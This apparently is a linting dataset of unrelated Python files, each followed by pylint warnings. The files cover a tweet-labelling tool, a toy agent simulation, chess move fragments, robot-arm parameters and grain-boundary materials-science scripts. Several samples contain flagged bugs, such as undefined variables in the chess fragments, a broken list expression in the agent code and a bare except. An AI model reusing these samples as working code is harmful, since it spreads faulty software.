53 self.__set_schema(schema_url) 54 55 def convert_json(self): 56 if self.qr_data is None: 57 raise DataMapperError("QR_DATA_IS_WRONG") 58 if self.schema is None: 59 raise DataMapperError("SCHEMA_IS_WRONG") 60 self._save_json(self.qr_data, self.schema['properties']) 61 return self.json
18 - warning: bad-indentation 19 - warning: bad-indentation 20 - warning: bad-indentation 21 - warning: bad-indentation 22 - warning: bad-indentation 23 - warning: bad-indentation 24 - warning: bad-indentation 25 - warning: bad-indentation 26 - warning: bad-indentation 27 - warning: bad-indentation 28 - warning: bad-indentation 29 - warning: bad-indentation 30 - warning: bad-indentation 31 - warning: bad-indentation 32 - warning: bad-indentation 34 - warning: bad-indentation 35 - warning: bad-indentation 36 - warning: bad-indentation 39 - refactor: consider-using-with 9 - refactor: too-few-public-methods
1 import pandas as pd 2 import csv 3 import os 4 from pandas import ExcelWriter 5 6 7 8 class Tweet: 9 def import_data(self, PATH, type): 10 if type == "xlsx": 11 xl = pd.ExcelFile(PATH) 12 data = xl.parse("Sheet1") 13 if type == "csv": 14 data = pd.read_csv(PATH) 15 # if type == "csv": 16 # with open(PATH, newline='') as f: 17 # reader = csv.reader(f) 18 # data = list(reader) 19 return data 20 21 def label_key2char(self, key): 22 """ 23 :param num: the input x,y,z from keyboard 24 :return: fact, opinion, anti-fact, if other than x,y,z return "" 25 """ 26 if key == "0": 27 return "fact" 28 elif key == "1": 29 return "opinion" 30 elif key == "2": 31 return "misinformation" 32 else: 33 return "" 34 35 def create_labels(self, df): 36 """ 37 :param df: imported data in dataframe format 38 :return: dataframe with added label in ManualLabel column 39 """ 40 labels = df["ManualLabel"].tolist() 41 for index, row in df.iterrows(): 42 if pd.isna(row["ManualLabel"]): 43 print("===========") 44 print("Tweet Text") 45 print(row["Tweet Text"]) 46 print("===========") 47 print("Row Number: "+ str(index)) 48 print("Subjective: " + str(row["SubjectivityScores"])) 49 print("Sentiment: " + str(row["FlairSentimentScore"]) + " " + str(row["FlairSentiment"])) 50 print("===========") 51 print('Classify as fact(0), opinion(1), misinformation(2) OR Skip(s), Quit(q): ') 52 print("Your Label:") 53 getch = _Getch() 54 label = getch() 55 label_char = self.label_key2char(label) 56 os.system('cls' if os.name == 'nt' else 'clear') 57 if label == "q": 58 break 59 labels[index] = label_char 60 else: 61 continue 62 df.drop(columns=["ManualLabel"], inplace=True) 63 df["ManualLabel"] = labels 64 return df 65 66 def save_labels(self, tweets_labeled, PATH, type, index): 67 df = tweets_labeled 68 if type == "xlsx": 69 writer = ExcelWriter(PATH) 70 df.to_excel(writer, 'Sheet1', index=index) 71 writer.save() 72 if type == "csv": 73 df.to_csv(PATH, index=index) 74 75 76 class _Getch: 77 """Gets a single character from standard input. Does not echo to the 78 screen.""" 79 def __init__(self): 80 try: 81 self.impl = _GetchWindows() 82 except ImportError: 83 self.impl = _GetchUnix() 84 85 def __call__(self): return self.impl() 86 87 88 class _GetchUnix: 89 def __init__(self): 90 import tty, sys 91 92 def __call__(self): 93 import sys, tty, termios 94 fd = sys.stdin.fileno() 95 old_settings = termios.tcgetattr(fd) 96 try: 97 tty.setraw(sys.stdin.fileno()) 98 ch = sys.stdin.read(1) 99 finally: 100 termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) 101 return ch 102 103 104 class _GetchWindows: 105 def __init__(self): 106 import msvcrt 107 108 def __call__(self): 109 import msvcrt 110 return msvcrt.getch() 111
9 - warning: redefined-builtin 19 - error: possibly-used-before-assignment 26 - refactor: no-else-return 66 - warning: redefined-builtin 71 - error: no-member 76 - refactor: too-few-public-methods 90 - warning: unused-import 90 - warning: unused-import 88 - refactor: too-few-public-methods 106 - warning: unused-import 104 - refactor: too-few-public-methods 2 - warning: unused-import
1 # This is a sample Python script. 2 3 # Press ⌃R to execute it or replace it with your code. 4 # Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings. 5 from utils import Tweet 6 7 def print_hi(name): 8 # Use a breakpoint in the code line below to debug your script. 9 print(f'Hi, {name}') # Press ⌘F8 to toggle the breakpoint. 10 11 12 # Press the green button in the gutter to run the script. 13 if __name__ == '__main__': 14 print_hi('Start Labeling') 15 16 # See PyCharm help at https://www.jetbrains.com/help/pycharm/ 17 #PATH = "Jun/test.csv" 18 PATH = "Kebby/MarchNonExpertsManualLabel3.csv" #first save the .xlsx file as .csv 19 20 tweet = Tweet() 21 tweets = tweet.import_data(PATH, "csv") 22 tweets_labeled = tweet.create_labels(tweets) 23 tweet.save_labels(tweets_labeled, PATH, "csv", index=False)
Clean Code: No Issues Detected
1 # --------------------------------------------------------------------------- 2 # --------------------------------------------------------------------------- 3 # This code is a supplement for the journal article titled: 4 # "Spectrum of Embrittling Potencies and Relation to Properties of 5 # Symmetric-Tilt Grain Boundaries" 6 # ------------------ 7 # This code performs the following tasks: 8 # 1) Reads in Fi, Xi, Pi from the previous step 9 # 2) Calculates site-specific properties that are shown in Table 2 and Fig. 6 10 # 3) Calculates collective-behavior properties that are shown in Table 3 and Fig. 5 11 # 4) Generates all data frames for plotting 12 # --- Definitions and Abbreviations -- 13 # GB: Grain boundary 14 # FS: Free surface 15 # ------------------ 16 # Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*) 17 # (1) University of Florida, Gainesville, FL, USA 18 # (2) Center for Integrated Nanotechnologies, Sandia National Laboratories, 19 # Albuquerque, NM, USA 20 # (*) dspearot@ufl.edu 21 # --------------------------------------------------------------------------- 22 # --------------------------------------------------------------------------- 23 #%% Imports 24 import numpy as np 25 import pandas as pd 26 from os import listdir,path 27 28 # %% Define functions 29 def getNumOfAtoms(file_path, file_name): 30 ''' 31 Obtain number of atoms from the file. 32 33 Parameters 34 ---------- 35 file_path : File path 36 file_name : Name of the file 37 38 Returns 39 ------- 40 Number of atoms 41 42 ''' 43 with open(path.join(file_path,file_name), 'r') as atoms_file: 44 # Number of atoms is equal to number of lines without the header 45 lineCount = 0 46 for line in atoms_file: 47 lineCount += 1 48 return int(lineCount)-1 49 50 def getEnergies(file_path, file_name, arr): 51 ''' 52 Function to obtain energies from file 53 54 Parameters 55 ---------- 56 file_path : File path 57 file_name : Name of the file 58 arr : Array to write energies 59 60 ''' 61 with open(path.join(file_path,file_name), 'r') as results_file: 62 for ind,line in enumerate(results_file): 63 # Skip the header 64 if "#" not in line: 65 line = line.split() 66 for j in range(int(np.size(line))): 67 arr[int(ind)-1,j] = line[j] 68 69 def segEngOcc(energies,col_num,NDIGITS): 70 ''' 71 Function to obtain energies from file 72 73 Parameters 74 ---------- 75 energies : Energies obtained from simulations 76 col_num : Segregation energy column number 77 NDIGITS : Number of digits to consider when looking at unique segregation 78 energies 79 80 Returns 81 ------- 82 DE_seg_i_GB : Segregation energy of site type i 83 N_hat_i_GB : Number of occurences of the segregation energy of site type i 84 num_site_types : Total number of unique site types 85 site_type_ind : Indices of matching energies between DE_seg_i_GB array and energies array 86 87 ''' 88 89 # Round energies by the given number of digits, and then find number of unique energies and number of occurences 90 DE_seg_i_GB,N_hat_i_GB = np.unique(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS), return_counts=True) 91 # Number of site types 92 num_site_types = int(np.size(DE_seg_i_GB)) 93 # We will use the site_type_ind list to match the site types between GBs and FSs. 94 site_type_ind = [] 95 # Now that we have matched the rounded energies, find originals and put back into DE_seg_i_GB array 96 for i in range(num_site_types): 97 site_type_ind.append(np.where(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS) == DE_seg_i_GB[i])[1][0]) 98 DE_seg_i_GB[i] = energies[site_type_ind[i],col_num] 99 return (DE_seg_i_GB, N_hat_i_GB, num_site_types, site_type_ind) 100 # %% MAIN 101 # Read in data frames 102 df_Pop = pd.read_csv("../Results/Pop.csv",index_col = 0).astype(float) 103 104 # From data frame to arrays 105 delta_E_seg_GB_i = np.array(df_Pop['delta_E_seg_GB_i']) 106 Pi = np.array(df_Pop['Pi']) 107 108 # Round by this number when comparing energies 109 NDIGITS = 3 110 111 # Perform simulations for all given models 112 allSims = listdir('../GBs/') 113 114 # %% Create a data frame to store all results 115 # Define columns (three properties shown in Fig. 5) 116 columns_all = ["DE_hat_b","PR_hat_GB","E_hat_b"] 117 # Tilt and GB normals as indices of the data frame 118 tilt_axes = [sim.split('_')[0] for sim in allSims] 119 GB_normals = [sim.split('_')[1] for sim in allSims] 120 # Levels required for a multi index data frame 121 levels_all = list(zip(*[tilt_axes, GB_normals])) 122 # Define indices 123 index_all = pd.MultiIndex.from_tuples(levels_all, names=['Tilt', 'Normal']) 124 # Initialize the data frame 125 df_all = pd.DataFrame(index = index_all, columns=columns_all) 126 127 #%% For each sample 128 for indSim,sim in enumerate(allSims): 129 130 # Obtain GB normal and tilt axes from the folder names 131 GB_normal = str(sim.split('_')[1]) 132 GB_tilt = str(sim.split('_')[0]) 133 134 # Model path 135 model_path = path.join("../GBs/", str(sim) + "/") 136 137 # Read in number of GB atoms considered in the simulation 138 N_hat_GB = getNumOfAtoms(path.join(model_path, "Results/"),"GBEnergies.dat") 139 140 # Initialize an array for energies of individual sites in GB models 141 GBenergies = np.zeros((N_hat_GB,5)) 142 # Initialize an array for energies of individual sites in FS models 143 FSenergies = np.zeros((N_hat_GB,5)) 144 145 try: 146 # Read energies for each sample 147 getEnergies(path.join(model_path, "Results/"),"GBEnergies.dat",GBenergies) 148 getEnergies(path.join(model_path, "Results/"),"FSEnergies.dat",FSenergies) 149 150 # Sort by atom ID 151 GBenergies = GBenergies[np.argsort(GBenergies[:,0]),:] 152 FSenergies = FSenergies[np.argsort(FSenergies[:,0]),:] 153 154 # Weed out non-matching simulations (if one of two simulations per atom ID is failed) 155 # Find out the intersection vector of two arrays, then delete rows with different atom IDs 156 for ind,val in enumerate(np.asarray(np.intersect1d(GBenergies[:,0],FSenergies[:,0]),dtype=int)): 157 if (not np.searchsorted(GBenergies[:,0],val) == ind): 158 GBenergies = np.delete(GBenergies,ind,0) 159 if (not np.searchsorted(FSenergies[:,0],val) == ind): 160 FSenergies = np.delete(FSenergies,ind,0) 161 162 # Update number of atoms 163 N_hat_GB = np.size(GBenergies,axis=0) 164 165 # Find unique segregation energies and their number of occurences using segEngOcc function 166 DE_seg_i_GB, N_hat_i_GB, num_site_types_GB, site_type_ind_GB = segEngOcc(GBenergies,4,NDIGITS) 167 # Site type indices should be preserved after cleavage (See Section 4) 168 DE_seg_i_FS = FSenergies[site_type_ind_GB,4] 169 # Embrittling potencies 170 DE_b_i = GBenergies[site_type_ind_GB,4]-FSenergies[site_type_ind_GB,4] 171 172 # Site occupancies 173 P_bar_i_GB = np.zeros(num_site_types_GB) 174 175 # Obtain P_bar_i_GB from the population (closest value) 176 for i in range(num_site_types_GB): P_bar_i_GB[i] = Pi[(np.abs(delta_E_seg_GB_i - DE_seg_i_GB[i])).argmin()] 177 178 # Rescaled site occupancy for each site type i 179 PR_hat_i_GB = P_bar_i_GB/np.sum(np.multiply(P_bar_i_GB, N_hat_i_GB)) 180 181 # Site specific embrittling estimator 182 E_hat_b_i = np.multiply(PR_hat_i_GB,DE_b_i) 183 184 # Sample embrittling estimator 185 E_hat_b = np.sum(np.multiply(np.multiply(PR_hat_i_GB,N_hat_i_GB),DE_b_i))/(N_hat_GB) 186 187 # Write properties to the all results data frame 188 df_all['DE_hat_b'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(DE_b_i,N_hat_i_GB)))/N_hat_GB 189 df_all['PR_hat_GB'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(PR_hat_i_GB,N_hat_i_GB)))/N_hat_GB 190 df_all['E_hat_b'][GB_tilt,GB_normal] = E_hat_b 191 192 except: 193 print(indSim+1,sim,"Properties not calculated!") 194 continue 195 196 # %% To csv 197 df_all.to_csv("../Results/AllResults.csv")
43 - warning: unspecified-encoding 46 - warning: unused-variable 62 - warning: redefined-outer-name 61 - warning: unspecified-encoding 69 - warning: redefined-outer-name 90 - warning: redefined-outer-name 90 - warning: redefined-outer-name 96 - warning: redefined-outer-name 192 - warning: bare-except
1 # --------------------------------------------------------------------------- 2 # --------------------------------------------------------------------------- 3 # This code is a supplement for the journal article titled: 4 # "Spectrum of Embrittling Potencies and Relation to Properties of 5 # Symmetric-Tilt Grain Boundaries" 6 # ------------------ 7 # This code performs the following tasks: 8 # 1) Obtains density of states from the previous step 9 # 2) Calculates Xi and Pi (check the paper for definitions) at the population 10 # level (Fig.4) 11 # 3) Write Xi and Pi calculated in this step to a data frame, to be processed 12 # at the sample level 13 # --- Definitions and Abbreviations -- 14 # GB: Grain boundary 15 # FS: Free surface 16 # ------------------ 17 # Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*) 18 # (1) University of Florida, Gainesville, FL, USA 19 # (2) Center for Integrated Nanotechnologies, Sandia National Laboratories, 20 # Albuquerque, NM, USA 21 # (*) dspearot@ufl.edu 22 # --------------------------------------------------------------------------- 23 # --------------------------------------------------------------------------- 24 #%% Imports 25 import numpy as np 26 import pandas as pd 27 28 # %% Define functions 29 def calcXtot(delta_E_seg_GB_i,Fi,X_bulk): 30 ''' 31 Calculate total solute concentration from bulk solute concentration. 32 33 Parameters 34 ---------- 35 X_bulk : Bulk solute concentration 36 delta_E_seg_GB_i : All segregation energies for each site type i 37 Fi : Density of states for each site type within the population 38 39 Returns 40 ------- 41 X_tot : Total solute concentration within the population 42 43 ''' 44 # Number of site types 45 n_site_types = np.size(Fi,axis=0) 46 # Initialize and calculate the probability distribution function for each 47 # site type i with the given bulk concentration 48 Xi_with_bulk = np.zeros(n_site_types) 49 for i in range(n_site_types): Xi_with_bulk[i] = 1 / (1 + ((1 - X_bulk) / X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB * T))) 50 # Calculate the effective solute concentration 51 X_bar = np.sum(Fi * Xi_with_bulk) 52 # Return the total solute concentration 53 return ((1 - f_int) * X_bulk + f_int * X_bar) 54 55 def fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,tol): 56 ''' 57 Calculate bulk solute concentration from total solute concentration using 58 midpoint trial and improvement solver. 59 60 Parameters 61 ---------- 62 delta_E_seg_GB_i : All segregation energies for each site type i 63 Fi : Density of states for each site type 64 X_tot : Total solute concentration 65 tol : Tolerance 66 67 Returns 68 ------- 69 If a result is found, return X_bulk. 70 71 ''' 72 # Initial lower and upper estimates 73 x_lo = 0.0 74 x_hi = X_tot*2 75 # Initial guess 76 x_0 = (x_lo + x_hi)/2 77 # Calculate a trial value using calcXtot function 78 X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0) 79 # Initialize iteration counter 80 iter_count = 0 81 # Maximum number of iterations 82 max_iter = 100 83 # Check if the result is within the tolerance and number of iterations 84 # is less than the maximum value 85 while((np.abs(X_tot_trial - X_tot) > tol) and (iter_count < max_iter)): 86 if(X_tot_trial > X_tot): 87 x_hi = x_0 88 x_0 = (x_hi + x_lo)/2 # Next guess 89 else: 90 x_lo = x_0 91 x_0 = (x_hi + x_lo)/2 # Next guess 92 # Calculate the new trial value using calcXtot function 93 X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0) 94 # Increment the iteration counter 95 iter_count +=1 96 # Check whether a total solute concentration can be found 97 if (iter_count == max_iter): 98 print("Could not find a value.") 99 return (0) 100 else: 101 return (x_0) 102 103 def calcPopProp(delta_E_seg_GB_i,Fi,X_tot): 104 ''' 105 Calculate population properties. 106 107 Parameters 108 ---------- 109 delta_E_seg_GB_i : All segregation energies for each site type i 110 Fi : Density of states for each site type 111 X_tot : Total solute concentration 112 113 Returns 114 ------- 115 X_bulk : Bulk solute concentration 116 Xi : Fraction of occupied type i sites 117 Pi : Solute occupancy density 118 X_bar : Effective solute concentration 119 delta_E_bar_seg_GB_i : Effective segregation energy per site type i 120 delta_E_bar_seg_GB : Total effective segregation energy 121 122 ''' 123 # Calculate the bulk concentration using fromXtotToXbulk function 124 X_bulk = fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,1E-4) 125 # Raise an exception if a bulk solute concentration cannot be calculated with given total solute concentration 126 if (X_bulk==0): 127 raise Exception('Error: Cannot calculate a bulk solute concentration with given total solute concentration.') 128 # Calculate the site specific probability distribution function and convert it to numpy array 129 Xi = [(1/(1+ ((1-X_bulk)/X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB*T)))) for i in range(np.size(delta_E_seg_GB_i))] 130 Xi = np.array(Xi) 131 # Site occupancy 132 Pi = Fi * Xi 133 # Effective solute concentration 134 X_bar = np.sum(Pi) 135 # Effective segregation energy for each site type i 136 delta_E_bar_seg_GB_i = (1/(X_bar*(1-X_bar))) * (Fi * delta_E_seg_GB_i * Xi * (1-Xi)) 137 # Effective segregation energy 138 delta_E_bar_seg_GB = np.sum(delta_E_bar_seg_GB_i) 139 # Return all calculated properties 140 return (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB) 141 142 # %% MAIN 143 # Read-in normalized density of states (Format: Index/Energies/Frequencies) 144 df_Fi_GB = pd.read_csv("../Results/Fi_GB.csv",index_col = 0) 145 146 # Segregation energies for each site type i 147 delta_E_seg_GB_i = np.array(df_Fi_GB['Energy']) 148 # Density of states 149 Fi = np.array(df_Fi_GB['Freq']) 150 151 # %% Variables 152 # Total solute concentration 153 X_tot = 15/100 # no of solute atoms/no of GB atoms 154 # Fraction of interface sites to all segregation sites 155 f_int = 0.162 156 # Boltzmann Constant in eV K-1 157 kB = 0.00008617333262 158 # Temperature 159 T = 300 # K 160 161 # %% Calculate properties corresponding to the GB population using calcPopProp function 162 (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB) = calcPopProp(delta_E_seg_GB_i,Fi,X_tot) 163 164 # %% Create a data frame with the population properties 165 df_Pop = pd.DataFrame(np.transpose([delta_E_seg_GB_i, Fi, Xi, Pi]),columns=['delta_E_seg_GB_i','Fi','Xi','Pi']).astype(float) 166 # Convert data frame to csv 167 df_Pop.to_csv("../Results/Pop.csv")
29 - warning: redefined-outer-name 29 - warning: redefined-outer-name 29 - warning: redefined-outer-name 51 - warning: redefined-outer-name 55 - warning: redefined-outer-name 55 - warning: redefined-outer-name 55 - warning: redefined-outer-name 97 - refactor: no-else-return 103 - warning: redefined-outer-name 103 - warning: redefined-outer-name 103 - warning: redefined-outer-name 124 - warning: redefined-outer-name 129 - warning: redefined-outer-name 132 - warning: redefined-outer-name 134 - warning: redefined-outer-name 136 - warning: redefined-outer-name 138 - warning: redefined-outer-name 127 - warning: broad-exception-raised
1 import pickle, random 2 t = open("test.info", "wb") 3 t.truncate(0) 4 dic = {} 5 for x in range(0, 10): 6 randomnum = random.randint(0, 100) 7 print(randomnum) 8 dic[randomnum] = bool(input("1/0 big ")) 9 pickle.dump(dic, t) 10 t.close()
6 - warning: bad-indentation 7 - warning: bad-indentation 8 - warning: bad-indentation 2 - refactor: consider-using-with
1 import copy 2 import pickle 3 import random 4 import sys 5 print(" Max testing intellegence") 6 print("a simple AI simulation") 7 print("made with python version "+sys.version) 8 file = open(r"test.info", mode = "rb") 9 try: 10 testdict = pickle.load(file) 11 except EOFError: 12 pass 13 file.close() 14 global agentnum 15 agentnum = int(input("agents for MAX")) 16 class Agent(object): 17 def __init__(self, lineval): 18 self.lineval = lineval 19 self.score = 0 20 def test(self, testsheet): 21 answer = [] 22 for x in testsheet: 23 if round(x) >= self.lineval: 24 answer.append(True) 25 else: 26 answer.append(False) 27 return answer 28 def reproduce(self, other): 29 us=other 30 usnums = [] 31 for x in us: 32 usnums.append(x.score) 33 if usnums.index(max(usnums)) == us.index(self): 34 agentsnew = [] 35 for x in range(0, agentnum-1): 36 agentsnew.append(copy.copy(self)) 37 agentsnew[len(agentsnew-1)].lineval += random.randint(-1, 1) 38 agentsnew.append(self) 39 return agentsnew 40 else: 41 try: 42 return [] 43 finally: 44 del self 45 46 iternum = int(input("iteration count")) 47 testque = list(testdict.keys()) 48 testans = list(testdict.values()) 49 agents=[Agent(random.randint(0, 100)), Agent(random.randint(0, 100)), Agent(random.randint(0, 100))] 50 for z in agents: 51 print(z.lineval) 52 for x in range(0, iternum): 53 for i in agents: 54 right = 0 55 testresults = i.test(testque) 56 for j in testresults: 57 if j == testans[testresults.index(j)]: 58 right += 1 59 i.score = right 60 for y in agents: 61 r = i.reproduce(agents) 62 if len(r) != 0: 63 print("iteration "+str(x+1)+" sucessful") 64 agents = r 65 for nz in agents: 66 print(nz.lineval) 67 print("done") 68 while True: 69 hinputnum = int(input("number")) 70 if random.choice(agents).lineval >= hinputnum: 71 print("small number") 72 else: 73 print("big number")
14 - warning: global-at-module-level 16 - refactor: useless-object-inheritance 22 - warning: redefined-outer-name 31 - warning: redefined-outer-name 33 - refactor: no-else-return 8 - refactor: consider-using-with
1 Rook, King, Pawn, Queen, Horse = ['r', 'k', 'p', 'q', 'h'] 2 3 if material == Material.Queen: 4 moves = self.queen_move(turn, location) 5 if moves != []: 6 total_moves.extend(moves) 7 if material == Material.Horse: 8 moves = self.horse_move(turn, location) 9 if move != []: 10 total_moves.extend(moves) 11 12 def horse_move(self, turn, location_1): 13 moves = [] 14 x = location_1[0] 15 y = location_1[1] 16 if y > 1: 17 y1 = y - 2 18 if x != 0: 19 x1 = x - 1 20 location_2 = (x1, y1) 21 if self.check_occupied_by_self(location_2) == 0: 22 move = (location_1, location_2) 23 moves.append(move) 24 if x != 8: 25 x1 = x + 1 26 location_2 = (x1, y1) 27 if self.check_occupied_by_self(location_2) == 0: 28 move = (location_1, location_2) 29 moves.append(move) 30 if y < 6: 31 y1 = y + 2 32 if x != 0: 33 x1 = x - 1 34 location_2 = (x1, y1) 35 if self.check_occupied_by_self(location_2) == 0: 36 move = (location_1, location_2) 37 moves.append(move) 38 if x != 8: 39 x1 = x + 1 40 location_2 = (x1, y1) 41 if self.check_occupied_by_self(location_2) == 0: 42 move = (location_1, location_2) 43 moves.append(move) 44 if x > 1: 45 x1 = x - 2 46 if y != 0: 47 y1 = y - 1 48 location_2 = (x1, y1) 49 if self.check_occupied_by_self(location_2) == 0: 50 move = (location_1, location_2) 51 moves.append(move) 52 if y != 8: 53 y1 = y + 1 54 location_2 = (x1, y1) 55 if self.check_occupied_by_self(location_2) == 0: 56 move = (location_1, location_2) 57 moves.append(move) 58 if x < 6: 59 x1 = x + 2 60 if y != 0: 61 y1 = y - 1 62 location_2 = (x1, y1) 63 if self.check_occupied_by_self(location_2) == 0: 64 move = (location_1, location_2) 65 moves.append(move) 66 if y != 8: 67 y1 = y + 1 68 location_2 = (x1, y1) 69 if self.check_occupied_by_self(location_2) == 0: 70 move = (location_1, location_2) 71 moves.append(move) 72 return moves 73 74 def queen_move(self, turn, location_1): 75 moves = [] 76 location_2 = list(location_1) 77 rook_moves = self.rook_move(turn,location_1) 78 moves.extend(rook_moves) 79 while location_2[0] != 7 and location_2[1] != 0: 80 location_2[0] += 1 81 location_2[1] -= 1 82 if self.check_occupied_by_self(tuple(location_2)) == 0: 83 moves.append([location_1, tuple(location_2)]) 84 else: 85 break 86 if self.check_occupied_by_other(tuple(location_2)) == 1: 87 break 88 location_2 = list(location_1) 89 while location_2[0] != 7 and location_2[1] != 7: 90 location_2[0] += 1 91 location_2[1] += 1 92 if self.check_occupied_by_self(tuple(location_2)) == 0: 93 moves.append([location_1, tuple(location_2)]) 94 else: 95 break 96 if self.check_occupied_by_other(tuple(location_2)) == 1: 97 break 98 location_2 = list(location_1) 99 while location_2[0] != 0 and location_2[1] != 7: 100 location_2[0] -= 1 101 location_2[1] += 1 102 if self.check_occupied_by_self(tuple(location_2)) == 0: 103 moves.append([location_1, tuple(location_2)]) 104 else: 105 break 106 if self.check_occupied_by_other(tuple(location_2)) == 1: 107 break 108 location_2 = list(location_1) 109 while location_2[0] != 0 and location_2[1] != 0: 110 location_2[0] -= 1 111 location_2[1] -= 1 112 if self.check_occupied_by_self(tuple(location_2)) == 0: 113 moves.append([location_1, tuple(location_2)]) 114 else: 115 break 116 if self.check_occupied_by_other(tuple(location_2)) == 1: 117 break 118 return moves 119 120 121 if material == Material.Queen: 122 if side == Side.White: 123 score += 50 124 else: 125 score -= 50
13 - warning: bad-indentation 14 - warning: bad-indentation 15 - warning: bad-indentation 16 - warning: bad-indentation 17 - warning: bad-indentation 18 - warning: bad-indentation 19 - warning: bad-indentation 20 - warning: bad-indentation 21 - warning: bad-indentation 22 - warning: bad-indentation 23 - warning: bad-indentation 24 - warning: bad-indentation 25 - warning: bad-indentation 26 - warning: bad-indentation 27 - warning: bad-indentation 28 - warning: bad-indentation 29 - warning: bad-indentation 30 - warning: bad-indentation 31 - warning: bad-indentation 32 - warning: bad-indentation 33 - warning: bad-indentation 34 - warning: bad-indentation 35 - warning: bad-indentation 36 - warning: bad-indentation 37 - warning: bad-indentation 38 - warning: bad-indentation 39 - warning: bad-indentation 40 - warning: bad-indentation 41 - warning: bad-indentation 42 - warning: bad-indentation 43 - warning: bad-indentation 44 - warning: bad-indentation 45 - warning: bad-indentation 46 - warning: bad-indentation 47 - warning: bad-indentation 48 - warning: bad-indentation 49 - warning: bad-indentation 50 - warning: bad-indentation 51 - warning: bad-indentation 52 - warning: bad-indentation 53 - warning: bad-indentation 54 - warning: bad-indentation 55 - warning: bad-indentation 56 - warning: bad-indentation 57 - warning: bad-indentation 58 - warning: bad-indentation 59 - warning: bad-indentation 60 - warning: bad-indentation 61 - warning: bad-indentation 62 - warning: bad-indentation 63 - warning: bad-indentation 64 - warning: bad-indentation 65 - warning: bad-indentation 66 - warning: bad-indentation 67 - warning: bad-indentation 68 - warning: bad-indentation 69 - warning: bad-indentation 70 - warning: bad-indentation 71 - warning: bad-indentation 72 - warning: bad-indentation 75 - warning: bad-indentation 76 - warning: bad-indentation 77 - warning: bad-indentation 78 - warning: bad-indentation 79 - warning: bad-indentation 80 - warning: bad-indentation 81 - warning: bad-indentation 82 - warning: bad-indentation 83 - warning: bad-indentation 84 - warning: bad-indentation 85 - warning: bad-indentation 86 - warning: bad-indentation 87 - warning: bad-indentation 88 - warning: bad-indentation 89 - warning: bad-indentation 90 - warning: bad-indentation 91 - warning: bad-indentation 92 - warning: bad-indentation 93 - warning: bad-indentation 94 - warning: bad-indentation 95 - warning: bad-indentation 96 - warning: bad-indentation 97 - warning: bad-indentation 98 - warning: bad-indentation 99 - warning: bad-indentation 100 - warning: bad-indentation 101 - warning: bad-indentation 102 - warning: bad-indentation 103 - warning: bad-indentation 104 - warning: bad-indentation 105 - warning: bad-indentation 106 - warning: bad-indentation 107 - warning: bad-indentation 108 - warning: bad-indentation 109 - warning: bad-indentation 110 - warning: bad-indentation 111 - warning: bad-indentation 112 - warning: bad-indentation 113 - warning: bad-indentation 114 - warning: bad-indentation 115 - warning: bad-indentation 116 - warning: bad-indentation 117 - warning: bad-indentation 118 - warning: bad-indentation 3 - error: undefined-variable 3 - error: undefined-variable 4 - error: undefined-variable 4 - error: undefined-variable 4 - error: undefined-variable 6 - error: undefined-variable 7 - error: undefined-variable 7 - error: undefined-variable 8 - error: undefined-variable 8 - error: undefined-variable 8 - error: undefined-variable 9 - error: undefined-variable 10 - error: undefined-variable 13 - warning: redefined-outer-name 12 - refactor: too-many-branches 12 - refactor: too-many-statements 12 - warning: unused-argument 75 - warning: redefined-outer-name 74 - refactor: too-many-branches 121 - error: undefined-variable 121 - error: undefined-variable 122 - error: undefined-variable 122 - error: undefined-variable 123 - error: undefined-variable
1 #!python2 2 3 from __future__ import division, print_function 4 5 ################################ 6 # ZSB - Opdracht 2 # 7 # umi_parameters.py # 8 # 16/06/2017 # 9 # # 10 # Anna Stalknecht - 10792872 # 11 # Claartje Barkhof - 11035129 # 12 # Group C # 13 # # 14 ################################ 15 16 class UMI_parameters: 17 def __init__(self): 18 # Specifications of UMI 19 # Zed 20 self.hpedestal = 1.082 # di riser/zed in meters 21 self.pedestal_offset = 0.0675 # ai riser/zed 22 self.wpedestal = 0.1 # just leave it 0.1 23 24 # Dimensions upper arm 25 self.upper_length = 0.2535 # ai shoulder in meters 26 self.upper_height = 0.095 # di shoulder in meters 27 28 # Dimensions lower arm 29 self.lower_length = 0.2535 # ai elbow in meters 30 self.lower_height = 0.080 # di elbow in meters 31 32 # Dimensions wrist 33 self.wrist_height = 0.09 # di wrist in meters 34 35 # Height of the arm from the very top of the riser, to the tip of the gripper. 36 self.total_arm_height = self.pedestal_offset + self.upper_height \ 37 + self.lower_height + self.wrist_height 38 39 # Joint-ranges in meters (where applicable e.g. Riser, Gripper) and in degrees for the rest. 40 41 ## TODO for students: REPLACE MINIMUM_DEGREES AND MAXIMUM_DEGREES FOR EACH INDIVIDUAL JOINT, THEY ARE NOT THE SAME FOR 42 # SHOULDER, ELBOW, AND WRIST 43 self.joint_ranges = { 44 "Riser" : [0.0, 0.925], 45 "Shoulder" : [-90.0, 90.0], 46 "Elbow" : [-180.0, 110.0], 47 "Wrist" : [-110.0, 110.0], 48 "Gripper" : [0, 0.05] 49 } 50 51 def correct_height(self, y): 52 ''' 53 Function that corrects the y value of the umi-rtx, because the real arm runs from 54 from -self.hpedestal/2 to self.hpedestal/2, while y runs from 0 to self.hpedestal. 55 ''' 56 return y - 0.5*self.hpedestal
41 - warning: fixme 16 - refactor: too-many-instance-attributes 16 - refactor: too-few-public-methods
